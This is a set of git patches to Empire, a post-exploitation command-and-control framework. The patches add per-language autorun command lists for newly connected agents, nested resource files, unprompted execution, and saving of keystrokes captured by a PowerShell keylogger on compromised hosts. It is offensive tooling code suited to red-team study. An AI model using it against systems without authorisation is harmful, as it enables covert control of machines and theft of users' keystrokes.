--- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -94,7 +94,8 @@ class MainMenu(cmd.Cmd): self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) self.resourceQueue = [] - self.autoRuns = [] + #A hashtable of autruns based on agent language + self.autoRuns = {} self.handle_args() @@ -988,19 +989,46 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() - def do_autorun(self, arg): - "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" - if arg == "show": - print self.mainMenu.autoRuns - elif arg == "clear": - self.mainMenu.autoRuns = [] + def do_autorun(self, line): + "Read and execute a list of Empire commands from a file and execute on each new agent \"autorun \" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + line = line.strip() + if not line: + print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'") + return + cmds = line.split(' ') + resourceFile = cmds[0] + language = None + if len(cmds) > 1: + language = cmds[1] + elif not resourceFile == "show" and not resourceFile == "clear": + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + return + #show the current autorun settings by language or all + if resourceFile == "show": + if language: + if self.mainMenu.autoRuns.has_key(language): + print self.mainMenu.autoRuns[language] + else: + print "No autorun commands for language %s" % language + else: + print self.mainMenu.autoRuns + #clear autorun settings by language or all + elif resourceFile == "clear": + if language and not language == "all": + if self.mainMenu.autoRuns.has_key(language): + self.mainMenu.autoRuns.pop(language) + else: + print "No autorun commands for language %s" % language + else: + #clear all autoruns + self.mainMenu.autoRuns.clear() + #read in empire commands from the specified resource file else: - self.mainMenu.autoRuns = [] - with open(arg) as f: + with open(resourceFile) as f: cmds = f.read().splitlines() #don't prompt for user confirmation when running autorun commands noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns.extend(noPromptCmds) + self.mainMenu.autoRuns[language] = noPromptCmds def do_list(self, line): From 21e56bcc3e6128122c93bcff608cc40d29408eb8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 14:04:30 -0600 Subject: [PATCH 12/15] make sure autorun exists for agent language --- lib/common/agents.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 329f1c6..1604fb6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,7 +1343,7 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) - if len(self.mainMenu.autoRuns) > 0: + if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: autorunCmds = ["interact %s" % sessionID] autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) From 7e56e552a6acdec1eff396ac8a0c0156615c91dc Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 16:28:19 -0600 Subject: [PATCH 13/15] typo correction --- lib/common/empire.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ae3dff4..dc9e16a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -999,9 +999,9 @@ class AgentsMenu(SubMenu): resourceFile = cmds[0] language = None if len(cmds) > 1: - language = cmds[1] + language = cmds[1].lower() elif not resourceFile == "show" and not resourceFile == "clear": - print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'") return #show the current autorun settings by language or all if resourceFile == "show": From 30da1bced1cf2f883e3989e8d28dac46feabb4e1 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 10:25:19 -0600 Subject: [PATCH 14/15] add ability call resource within a resource file --- lib/common/empire.py | 45 +++++++++++++++++++++++++++++--------------- 1 file changed, 30 insertions(+), 15 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index dc9e16a..23e4a57 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -139,14 +139,9 @@ class MainMenu(cmd.Cmd): """ Handle any passed arguments. """ - if self.args.resource: resourceFile = self.args.resource[0] - if os.path.isfile(resourceFile): - self.do_resource(resourceFile) - else: - print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) - time.sleep(5) + self.do_resource(resourceFile) if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager @@ -397,8 +392,32 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.resourceQueue.extend(f.read().splitlines()) + self.resourceQueue.extend(self.buildQueue(arg)) + + def buildQueue(self, resourceFile, autoRun=False): + cmds = [] + if os.path.isfile(resourceFile): + with open(resourceFile, 'r') as f: + lines = [] + lines.extend(f.read().splitlines()) + else: + raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile) + for lineFull in lines: + line = lineFull.strip() + #ignore lines that start with the comment symbol (#) + if line.startswith("#"): + continue + #read in another resource file + elif line.startswith("resource "): + rf = line.split(' ')[1] + cmds.extend(self.buildQueue(rf, autoRun)) + #add noprompt option to execute without user confirmation + elif autoRun and line == "execute": + cmds.append(line + " noprompt") + else: + cmds.append(line) + + return cmds def do_exit(self, line): "Exit Empire" @@ -928,6 +947,7 @@ class SubMenu(cmd.Cmd): raise Exception("endautorun") self.cmdqueue.append(nextcmd) + def do_back(self, line): "Go back a menu." return True @@ -946,8 +966,7 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) + self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg)) def do_exit(self, line): "Exit Empire." @@ -1024,11 +1043,7 @@ class AgentsMenu(SubMenu): self.mainMenu.autoRuns.clear() #read in empire commands from the specified resource file else: - with open(resourceFile) as f: - cmds = f.read().splitlines() - #don't prompt for user confirmation when running autorun commands - noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns[language] = noPromptCmds + self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True) def do_list(self, line): From 6a283719f34f5f686c42edfec2b25bd8531fcc98 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 14:28:25 -0600 Subject: [PATCH 15/15] fix PS keylogger bug where it only logged to file while you were interacting with the agent --- lib/common/agents.py | 17 +++++++++++++++-- lib/common/empire.py | 20 ++++---------------- 2 files changed, 19 insertions(+), 18 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 1604fb6..965c9be 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1509,6 +1509,7 @@ class Agents: """ agentSessionID = sessionID + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1533,6 +1534,7 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: @@ -1717,9 +1719,20 @@ class Agents: elif responseName == "TASK_CMD_JOB": + #check if this is the powershell keylogging task, if so, write output to file instead of screen + if keyLogTaskID and keyLogTaskID == taskID: + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): + dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') + return + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: + # dynamic script output -> non-blocking + self.update_agent_results_db(sessionID, data) - # dynamic script output -> non-blocking - self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index 23e4a57..9693504 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -739,7 +739,6 @@ class MainMenu(cmd.Cmd): name = line.strip() sessionID = self.agents.get_agent_id_db(name) - if sessionID and sessionID != '' and sessionID in self.agents.agents: AgentMenu(self, sessionID) else: @@ -1560,27 +1559,17 @@ class PowerShellAgentMenu(SubMenu): """ Handle agent event signals. """ + if '[!] Agent' in signal and 'exiting' in signal: pass name = self.mainMenu.agents.get_agent_name_db(self.sessionID) - if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal): # display any results returned by this agent that are returned - # while we are interacting with it + # while we are interacting with it, unless they are from the powershell keylogger results = self.mainMenu.agents.get_agent_results_db(self.sessionID) - if results: - if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results): - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID) - if not os.path.abspath(savePath).startswith(safePath): - dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') - return - with open(savePath,"a+") as f: - new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: - print "\n" + results + if results and not sender == "AgentsPsKeyLogger": + print "\n" + results elif "[+] Part of file" in signal and "saved" in signal: if (str(self.sessionID) in signal) or (str(name) in signal): @@ -1758,7 +1747,6 @@ class PowerShellAgentMenu(SubMenu): self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command) - # update the agent log msg = "Tasked agent to kill process: " + str(process) self.mainMenu.agents.save_agent_log(self.sessionID, msg)